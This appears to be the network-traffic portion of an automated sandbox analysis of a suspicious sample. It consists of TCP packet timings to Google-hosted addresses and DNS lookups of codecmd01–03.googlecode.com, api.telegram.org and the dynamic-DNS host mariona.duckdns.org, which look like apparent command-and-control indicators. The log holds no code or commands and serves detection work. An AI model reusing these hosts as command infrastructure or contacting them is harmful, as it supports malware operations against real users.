Sep 2, 2024 14:25:28.044094086 CEST	60920	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:25:28.044094086 CEST	60920	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:25:28.369273901 CEST	60921	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:25:28.374901056 CEST	80	60921	74.125.71.82	192.168.2.5
Sep 2, 2024 14:25:28.374999046 CEST	60921	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:25:28.375195980 CEST	60921	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:25:28.380654097 CEST	80	60921	74.125.71.82	192.168.2.5
Sep 2, 2024 14:25:29.080496073 CEST	80	60921	74.125.71.82	192.168.2.5
Sep 2, 2024 14:25:29.080522060 CEST	80	60921	74.125.71.82	192.168.2.5
Sep 2, 2024 14:25:29.080583096 CEST	60921	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:25:29.080621004 CEST	60921	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:25:29.084120989 CEST	60921	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:25:29.084147930 CEST	60921	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:25:29.854305029 CEST	60922	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:25:30.210696936 CEST	80	60922	66.102.1.82	192.168.2.5
Sep 2, 2024 14:25:30.210793018 CEST	60922	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:25:30.211034060 CEST	60922	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:25:30.216609955 CEST	80	60922	66.102.1.82	192.168.2.5
Sep 2, 2024 14:25:30.927138090 CEST	80	60922	66.102.1.82	192.168.2.5
Sep 2, 2024 14:25:30.927166939 CEST	80	60922	66.102.1.82	192.168.2.5
Sep 2, 2024 14:25:30.927217960 CEST	60922	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:25:30.927217960 CEST	60922	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:25:30.927586079 CEST	60922	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:25:30.927624941 CEST	60922	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:25:31.260230064 CEST	60923	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:25:31.267087936 CEST	80	60923	74.125.133.82	192.168.2.5
Sep 2, 2024 14:25:31.267158985 CEST	60923	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:25:31.268795013 CEST	60923	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:25:31.273586035 CEST	80	60923	74.125.133.82	192.168.2.5
Sep 2, 2024 14:25:31.961060047 CEST	80	60923	74.125.133.82	192.168.2.5
Sep 2, 2024 14:25:31.961106062 CEST	80	60923	74.125.133.82	192.168.2.5
Sep 2, 2024 14:25:31.961182117 CEST	60923	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:25:31.961182117 CEST	60923	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:25:31.961929083 CEST	60923	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:25:31.961950064 CEST	60923	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:25:31.968142986 CEST	80	60923	74.125.133.82	192.168.2.5
Sep 2, 2024 14:25:31.968204975 CEST	60923	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:25:32.489186049 CEST	60924	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:25:32.494950056 CEST	80	60924	74.125.71.82	192.168.2.5
Sep 2, 2024 14:25:32.495021105 CEST	60924	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:25:32.495842934 CEST	60924	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:25:32.500657082 CEST	80	60924	74.125.71.82	192.168.2.5
Sep 2, 2024 14:25:33.180332899 CEST	80	60924	74.125.71.82	192.168.2.5
Sep 2, 2024 14:25:33.180351973 CEST	80	60924	74.125.71.82	192.168.2.5
Sep 2, 2024 14:25:33.180383921 CEST	60924	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:25:33.180416107 CEST	60924	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:25:33.187411070 CEST	60924	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:25:33.187436104 CEST	60924	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:25:33.702780962 CEST	60925	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:25:33.707667112 CEST	80	60925	66.102.1.82	192.168.2.5
Sep 2, 2024 14:25:33.707851887 CEST	60925	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:25:33.708385944 CEST	60925	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:25:33.713968992 CEST	80	60925	66.102.1.82	192.168.2.5
Sep 2, 2024 14:25:34.398102999 CEST	80	60925	66.102.1.82	192.168.2.5
Sep 2, 2024 14:25:34.398130894 CEST	80	60925	66.102.1.82	192.168.2.5
Sep 2, 2024 14:25:34.398212910 CEST	60925	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:25:34.398248911 CEST	60925	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:25:34.398606062 CEST	60925	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:25:34.398725986 CEST	60925	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:25:34.904531002 CEST	60926	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:25:34.909507990 CEST	80	60926	74.125.133.82	192.168.2.5
Sep 2, 2024 14:25:34.909626007 CEST	60926	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:25:35.140577078 CEST	60926	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:25:35.145611048 CEST	80	60926	74.125.133.82	192.168.2.5
Sep 2, 2024 14:25:35.619330883 CEST	80	60926	74.125.133.82	192.168.2.5
Sep 2, 2024 14:25:35.619350910 CEST	80	60926	74.125.133.82	192.168.2.5
Sep 2, 2024 14:25:35.619419098 CEST	60926	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:25:35.619452953 CEST	60926	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:25:35.620038986 CEST	60926	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:25:35.620066881 CEST	60926	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:25:35.979880095 CEST	60927	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:25:35.984798908 CEST	80	60927	74.125.71.82	192.168.2.5
Sep 2, 2024 14:25:35.984916925 CEST	60927	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:25:35.985097885 CEST	60927	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:25:35.989866018 CEST	80	60927	74.125.71.82	192.168.2.5
Sep 2, 2024 14:25:36.670576096 CEST	80	60927	74.125.71.82	192.168.2.5
Sep 2, 2024 14:25:36.670608997 CEST	80	60927	74.125.71.82	192.168.2.5
Sep 2, 2024 14:25:36.670696974 CEST	60927	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:25:36.670696974 CEST	60927	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:25:36.671242952 CEST	60927	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:25:36.671242952 CEST	60927	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:25:37.043025017 CEST	60928	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:25:37.048682928 CEST	80	60928	66.102.1.82	192.168.2.5
Sep 2, 2024 14:25:37.048778057 CEST	60928	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:25:37.049973011 CEST	60928	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:25:37.055452108 CEST	80	60928	66.102.1.82	192.168.2.5
Sep 2, 2024 14:25:37.747672081 CEST	80	60928	66.102.1.82	192.168.2.5
Sep 2, 2024 14:25:37.747693062 CEST	80	60928	66.102.1.82	192.168.2.5
Sep 2, 2024 14:25:37.747766972 CEST	60928	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:25:37.752867937 CEST	60928	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:25:37.752904892 CEST	60928	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:25:38.071352959 CEST	60929	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:25:38.076152086 CEST	80	60929	74.125.133.82	192.168.2.5
Sep 2, 2024 14:25:38.076345921 CEST	60929	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:25:38.076531887 CEST	60929	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:25:38.081301928 CEST	80	60929	74.125.133.82	192.168.2.5
Sep 2, 2024 14:25:38.774056911 CEST	80	60929	74.125.133.82	192.168.2.5
Sep 2, 2024 14:25:38.774075031 CEST	80	60929	74.125.133.82	192.168.2.5
Sep 2, 2024 14:25:38.774136066 CEST	60929	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:25:38.774482965 CEST	60929	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:25:38.774517059 CEST	60929	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:25:38.779587984 CEST	80	60929	74.125.133.82	192.168.2.5
Sep 2, 2024 14:25:38.779699087 CEST	60929	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:25:39.120090961 CEST	60930	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:25:39.131877899 CEST	80	60930	74.125.71.82	192.168.2.5
Sep 2, 2024 14:25:39.131983995 CEST	60930	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:25:39.132606983 CEST	60930	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:25:39.137430906 CEST	80	60930	74.125.71.82	192.168.2.5
Sep 2, 2024 14:25:39.821644068 CEST	80	60930	74.125.71.82	192.168.2.5
Sep 2, 2024 14:25:39.821660995 CEST	80	60930	74.125.71.82	192.168.2.5
Sep 2, 2024 14:25:39.821718931 CEST	60930	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:25:39.822127104 CEST	60930	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:25:39.822149038 CEST	60930	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:25:39.827282906 CEST	80	60930	74.125.71.82	192.168.2.5
Sep 2, 2024 14:25:39.827384949 CEST	60930	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:25:40.164549112 CEST	60931	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:25:40.169425011 CEST	80	60931	66.102.1.82	192.168.2.5
Sep 2, 2024 14:25:40.169514894 CEST	60931	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:25:40.170042992 CEST	60931	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:25:40.174978018 CEST	80	60931	66.102.1.82	192.168.2.5
Sep 2, 2024 14:25:40.868217945 CEST	80	60931	66.102.1.82	192.168.2.5
Sep 2, 2024 14:25:40.868238926 CEST	80	60931	66.102.1.82	192.168.2.5
Sep 2, 2024 14:25:40.868320942 CEST	60931	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:25:40.868320942 CEST	60931	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:25:40.869833946 CEST	60931	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:25:40.869882107 CEST	60931	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:25:41.226577997 CEST	60932	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:25:41.231416941 CEST	80	60932	74.125.133.82	192.168.2.5
Sep 2, 2024 14:25:41.231488943 CEST	60932	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:25:41.239294052 CEST	60932	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:25:41.244082928 CEST	80	60932	74.125.133.82	192.168.2.5
Sep 2, 2024 14:25:41.935189009 CEST	80	60932	74.125.133.82	192.168.2.5
Sep 2, 2024 14:25:41.935215950 CEST	80	60932	74.125.133.82	192.168.2.5
Sep 2, 2024 14:25:41.935281992 CEST	60932	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:25:41.953310013 CEST	60932	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:25:41.953342915 CEST	60932	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:25:42.626636028 CEST	60933	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:25:42.631472111 CEST	80	60933	74.125.71.82	192.168.2.5
Sep 2, 2024 14:25:42.631556034 CEST	60933	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:25:42.634526014 CEST	60933	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:25:42.639971972 CEST	80	60933	74.125.71.82	192.168.2.5
Sep 2, 2024 14:25:43.318037987 CEST	80	60933	74.125.71.82	192.168.2.5
Sep 2, 2024 14:25:43.318056107 CEST	80	60933	74.125.71.82	192.168.2.5
Sep 2, 2024 14:25:43.318118095 CEST	60933	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:25:43.321779966 CEST	60933	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:25:43.321800947 CEST	60933	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:25:43.753133059 CEST	60934	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:25:43.758088112 CEST	80	60934	66.102.1.82	192.168.2.5
Sep 2, 2024 14:25:43.758306980 CEST	60934	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:25:43.758307934 CEST	60934	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:25:43.763202906 CEST	80	60934	66.102.1.82	192.168.2.5
Sep 2, 2024 14:25:44.456948042 CEST	80	60934	66.102.1.82	192.168.2.5
Sep 2, 2024 14:25:44.456976891 CEST	80	60934	66.102.1.82	192.168.2.5
Sep 2, 2024 14:25:44.457192898 CEST	60934	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:25:44.457192898 CEST	60934	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:25:44.457670927 CEST	60934	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:25:44.457695961 CEST	60934	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:25:44.852909088 CEST	60935	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:25:44.859246969 CEST	80	60935	74.125.133.82	192.168.2.5
Sep 2, 2024 14:25:44.859375000 CEST	60935	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:25:45.015721083 CEST	60935	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:25:45.020476103 CEST	80	60935	74.125.133.82	192.168.2.5
Sep 2, 2024 14:25:45.574392080 CEST	80	60935	74.125.133.82	192.168.2.5
Sep 2, 2024 14:25:45.574419975 CEST	80	60935	74.125.133.82	192.168.2.5
Sep 2, 2024 14:25:45.574497938 CEST	60935	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:25:45.582067966 CEST	60935	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:25:45.582123041 CEST	60935	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:25:45.929975033 CEST	60936	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:25:45.934839010 CEST	80	60936	74.125.71.82	192.168.2.5
Sep 2, 2024 14:25:45.934915066 CEST	60936	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:25:45.936309099 CEST	60936	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:25:45.941145897 CEST	80	60936	74.125.71.82	192.168.2.5
Sep 2, 2024 14:25:46.650589943 CEST	80	60936	74.125.71.82	192.168.2.5
Sep 2, 2024 14:25:46.650604010 CEST	80	60936	74.125.71.82	192.168.2.5
Sep 2, 2024 14:25:46.650659084 CEST	60936	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:25:46.650684118 CEST	60936	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:25:46.651426077 CEST	60936	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:25:46.651456118 CEST	60936	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:25:46.992718935 CEST	60937	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:25:46.997565031 CEST	80	60937	66.102.1.82	192.168.2.5
Sep 2, 2024 14:25:46.997631073 CEST	60937	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:25:46.997848988 CEST	60937	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:25:47.002667904 CEST	80	60937	66.102.1.82	192.168.2.5
Sep 2, 2024 14:25:47.683612108 CEST	80	60937	66.102.1.82	192.168.2.5
Sep 2, 2024 14:25:47.683636904 CEST	80	60937	66.102.1.82	192.168.2.5
Sep 2, 2024 14:25:47.683725119 CEST	60937	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:25:47.684498072 CEST	60937	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:25:47.684544086 CEST	60937	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:25:48.113769054 CEST	60938	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:25:48.118670940 CEST	80	60938	74.125.133.82	192.168.2.5
Sep 2, 2024 14:25:48.119189024 CEST	60938	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:25:48.119525909 CEST	60938	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:25:48.124332905 CEST	80	60938	74.125.133.82	192.168.2.5
Sep 2, 2024 14:25:48.812828064 CEST	80	60938	74.125.133.82	192.168.2.5
Sep 2, 2024 14:25:48.812861919 CEST	80	60938	74.125.133.82	192.168.2.5
Sep 2, 2024 14:25:48.812906027 CEST	60938	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:25:48.813010931 CEST	60938	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:25:48.813381910 CEST	60938	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:25:48.813452959 CEST	60938	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:25:49.132752895 CEST	60939	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:25:49.137581110 CEST	80	60939	74.125.71.82	192.168.2.5
Sep 2, 2024 14:25:49.137662888 CEST	60939	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:25:49.137927055 CEST	60939	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:25:49.142765045 CEST	80	60939	74.125.71.82	192.168.2.5
Sep 2, 2024 14:25:49.823256969 CEST	80	60939	74.125.71.82	192.168.2.5
Sep 2, 2024 14:25:49.823276043 CEST	80	60939	74.125.71.82	192.168.2.5
Sep 2, 2024 14:25:49.823349953 CEST	60939	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:25:49.824094057 CEST	60939	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:25:49.824182987 CEST	60939	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:25:50.116759062 CEST	60940	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:25:50.121638060 CEST	80	60940	66.102.1.82	192.168.2.5
Sep 2, 2024 14:25:50.121944904 CEST	60940	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:25:50.122131109 CEST	60940	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:25:50.126893997 CEST	80	60940	66.102.1.82	192.168.2.5
Sep 2, 2024 14:25:50.836719990 CEST	80	60940	66.102.1.82	192.168.2.5
Sep 2, 2024 14:25:50.836738110 CEST	80	60940	66.102.1.82	192.168.2.5
Sep 2, 2024 14:25:50.836792946 CEST	60940	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:25:50.837156057 CEST	60940	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:25:50.837186098 CEST	60940	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:25:51.181360006 CEST	60941	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:25:51.186337948 CEST	80	60941	74.125.133.82	192.168.2.5
Sep 2, 2024 14:25:51.186502934 CEST	60941	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:25:51.186814070 CEST	60941	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:25:51.191682100 CEST	80	60941	74.125.133.82	192.168.2.5
Sep 2, 2024 14:25:51.893763065 CEST	80	60941	74.125.133.82	192.168.2.5
Sep 2, 2024 14:25:51.893783092 CEST	80	60941	74.125.133.82	192.168.2.5
Sep 2, 2024 14:25:51.897629023 CEST	60941	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:25:51.900624990 CEST	60941	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:25:51.900734901 CEST	60941	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:25:51.905802965 CEST	80	60941	74.125.133.82	192.168.2.5
Sep 2, 2024 14:25:51.905867100 CEST	60941	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:25:52.294682026 CEST	60942	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:25:52.299506903 CEST	80	60942	74.125.71.82	192.168.2.5
Sep 2, 2024 14:25:52.299593925 CEST	60942	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:25:52.300201893 CEST	60942	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:25:52.305047989 CEST	80	60942	74.125.71.82	192.168.2.5
Sep 2, 2024 14:25:52.988888025 CEST	80	60942	74.125.71.82	192.168.2.5
Sep 2, 2024 14:25:52.988936901 CEST	80	60942	74.125.71.82	192.168.2.5
Sep 2, 2024 14:25:52.988974094 CEST	60942	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:25:52.989002943 CEST	60942	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:25:52.989554882 CEST	60942	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:25:52.989574909 CEST	60942	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:25:53.350336075 CEST	60943	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:25:53.355207920 CEST	80	60943	66.102.1.82	192.168.2.5
Sep 2, 2024 14:25:53.355283976 CEST	60943	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:25:53.355711937 CEST	60943	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:25:53.360734940 CEST	80	60943	66.102.1.82	192.168.2.5
Sep 2, 2024 14:25:54.068357944 CEST	80	60943	66.102.1.82	192.168.2.5
Sep 2, 2024 14:25:54.068384886 CEST	80	60943	66.102.1.82	192.168.2.5
Sep 2, 2024 14:25:54.068536997 CEST	60943	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:25:54.068536997 CEST	60943	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:25:54.079947948 CEST	60943	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:25:54.080111027 CEST	60943	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:25:54.409248114 CEST	60944	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:25:54.414194107 CEST	80	60944	74.125.133.82	192.168.2.5
Sep 2, 2024 14:25:54.414339066 CEST	60944	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:25:54.414720058 CEST	60944	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:25:54.420562983 CEST	80	60944	74.125.133.82	192.168.2.5
Sep 2, 2024 14:25:55.107526064 CEST	80	60944	74.125.133.82	192.168.2.5
Sep 2, 2024 14:25:55.107557058 CEST	80	60944	74.125.133.82	192.168.2.5
Sep 2, 2024 14:25:55.107613087 CEST	60944	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:25:55.108052015 CEST	60944	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:25:55.108122110 CEST	60944	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:25:55.451138973 CEST	60945	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:25:55.455996037 CEST	80	60945	74.125.71.82	192.168.2.5
Sep 2, 2024 14:25:55.456125975 CEST	60945	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:25:55.456502914 CEST	60945	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:25:55.461241007 CEST	80	60945	74.125.71.82	192.168.2.5
Sep 2, 2024 14:25:56.147106886 CEST	80	60945	74.125.71.82	192.168.2.5
Sep 2, 2024 14:25:56.147131920 CEST	80	60945	74.125.71.82	192.168.2.5
Sep 2, 2024 14:25:56.147223949 CEST	60945	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:25:56.147223949 CEST	60945	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:25:56.162888050 CEST	60945	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:25:56.162916899 CEST	60945	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:25:56.631807089 CEST	60946	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:25:56.636831999 CEST	80	60946	66.102.1.82	192.168.2.5
Sep 2, 2024 14:25:56.636923075 CEST	60946	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:25:56.638997078 CEST	60946	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:25:56.643829107 CEST	80	60946	66.102.1.82	192.168.2.5
Sep 2, 2024 14:25:57.331805944 CEST	80	60946	66.102.1.82	192.168.2.5
Sep 2, 2024 14:25:57.331821918 CEST	80	60946	66.102.1.82	192.168.2.5
Sep 2, 2024 14:25:57.331912994 CEST	60946	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:25:57.332624912 CEST	60946	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:25:57.332681894 CEST	60946	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:25:57.620606899 CEST	60947	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:25:57.625526905 CEST	80	60947	74.125.133.82	192.168.2.5
Sep 2, 2024 14:25:57.625617027 CEST	60947	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:25:57.625899076 CEST	60947	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:25:57.630747080 CEST	80	60947	74.125.133.82	192.168.2.5
Sep 2, 2024 14:25:58.320272923 CEST	80	60947	74.125.133.82	192.168.2.5
Sep 2, 2024 14:25:58.320348024 CEST	60947	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:25:58.320545912 CEST	80	60947	74.125.133.82	192.168.2.5
Sep 2, 2024 14:25:58.320621967 CEST	60947	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:25:58.320722103 CEST	60947	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:25:58.320753098 CEST	60947	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:25:58.326643944 CEST	80	60947	74.125.133.82	192.168.2.5
Sep 2, 2024 14:25:58.326700926 CEST	60947	80	192.168.2.5	74.125.133.82

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 2, 2024 14:24:04.163503885 CEST	64562	53	192.168.2.5	1.1.1.1
Sep 2, 2024 14:24:04.178435087 CEST	53	64562	1.1.1.1	192.168.2.5
Sep 2, 2024 14:24:06.380841970 CEST	62739	53	192.168.2.5	1.1.1.1
Sep 2, 2024 14:24:06.402957916 CEST	53	62739	1.1.1.1	192.168.2.5
Sep 2, 2024 14:24:08.386642933 CEST	55051	53	192.168.2.5	1.1.1.1
Sep 2, 2024 14:24:08.405452967 CEST	53	55051	1.1.1.1	192.168.2.5
Sep 2, 2024 14:25:20.997040033 CEST	64049	53	192.168.2.5	1.1.1.1
Sep 2, 2024 14:25:21.943783045 CEST	53	64049	1.1.1.1	192.168.2.5
Sep 2, 2024 14:25:23.016846895 CEST	53476	53	192.168.2.5	1.1.1.1
Sep 2, 2024 14:25:24.015990973 CEST	53476	53	192.168.2.5	1.1.1.1
Sep 2, 2024 14:25:24.023211002 CEST	53	53476	1.1.1.1	192.168.2.5
Sep 2, 2024 14:25:27.027792931 CEST	53	53476	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Sep 2, 2024 14:24:04.163503885 CEST	192.168.2.5	1.1.1.1	0xc605	Standard query (0)	codecmd01.googlecode.com	A (IP address)	IN (0x0001)	false
Sep 2, 2024 14:24:06.380841970 CEST	192.168.2.5	1.1.1.1	0x822e	Standard query (0)	codecmd02.googlecode.com	A (IP address)	IN (0x0001)	false
Sep 2, 2024 14:24:08.386642933 CEST	192.168.2.5	1.1.1.1	0x5710	Standard query (0)	codecmd03.googlecode.com	A (IP address)	IN (0x0001)	false
Sep 2, 2024 14:25:20.997040033 CEST	192.168.2.5	1.1.1.1	0x14b4	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false
Sep 2, 2024 14:25:23.016846895 CEST	192.168.2.5	1.1.1.1	0x33a0	Standard query (0)	mariona.duckdns.org	A (IP address)	IN (0x0001)	false
Sep 2, 2024 14:25:24.015990973 CEST	192.168.2.5	1.1.1.1	0x33a0	Standard query (0)	mariona.duckdns.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Sep 2, 2024 14:24:04.178435087 CEST	1.1.1.1	192.168.2.5	0xc605	No error (0)	codecmd01.googlecode.com	googlecode.l.googleusercontent.com		CNAME (Canonical name)	IN (0x0001)	false
Sep 2, 2024 14:24:04.178435087 CEST	1.1.1.1	192.168.2.5	0xc605	No error (0)	googlecode.l.googleusercontent.com		66.102.1.82	A (IP address)	IN (0x0001)	false
Sep 2, 2024 14:24:06.402957916 CEST	1.1.1.1	192.168.2.5	0x822e	No error (0)	codecmd02.googlecode.com	googlecode.l.googleusercontent.com		CNAME (Canonical name)	IN (0x0001)	false
Sep 2, 2024 14:24:06.402957916 CEST	1.1.1.1	192.168.2.5	0x822e	No error (0)	googlecode.l.googleusercontent.com		74.125.133.82	A (IP address)	IN (0x0001)	false
